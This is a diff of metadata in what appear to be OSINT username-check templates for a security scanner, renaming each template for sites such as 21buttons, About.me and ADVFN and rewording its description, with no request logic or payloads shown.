cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N


@ -1,9 +1,9 @@
id: 21buttons
info:
name: 21buttons
name: 21buttons User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: 21buttons user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N


@ -1,9 +1,9 @@
id: 247sports
info:
name: 247sports
name: 247sports User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: 247sports user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N


@ -1,9 +1,9 @@
id: 3dnews
info:
name: 3DNews
name: 3DNews User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: 3DNews user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N


@ -1,9 +1,9 @@
id: 3dtoday
info:
name: 3dtoday
name: 3dtoday User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: 3dtoday user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N


@ -1,9 +1,9 @@
id: 7cup
info:
name: 7cup
name: 7cup User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: 7cup user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N


@ -1,9 +1,9 @@
id: 7dach
info:
name: 7dach
name: 7dach User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: 7dach user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N


@ -1,9 +1,9 @@
id: aaha-chat
info:
name: aaha_chat
name: Aaha chat User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: Aaha chat user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N


@ -1,9 +1,9 @@
id: aboutme
info:
name: about.me
name: About.me User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: About.me user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N


@ -1,9 +1,9 @@
id: acf
info:
name: ACF
name: ACF User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: ACF user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N


@ -1,9 +1,9 @@
id: admire-me
info:
name: admire_me
name: Admire me User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: Admire me user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N


@ -1,9 +1,9 @@
id: adult-forum
info:
name: Adult_Forum
name: Adult Forum User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: Adult Forum user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N


@ -1,9 +1,9 @@
id: adultism
info:
name: adultism
name: Adultism User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: Adultism user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N


@ -1,9 +1,9 @@
id: advfn
info:
name: ADVFN
name: ADVFN User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: ADVFN user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N


@ -1,9 +1,9 @@
id: aflam
info:
name: aflam
name: Aflam User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: Aflam user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N


@ -1,9 +1,9 @@
id: airline-pilot-life
info:
name: Airline_Pilot_Life
name: Airline Pilot Life User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: Airline Pilot Life user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
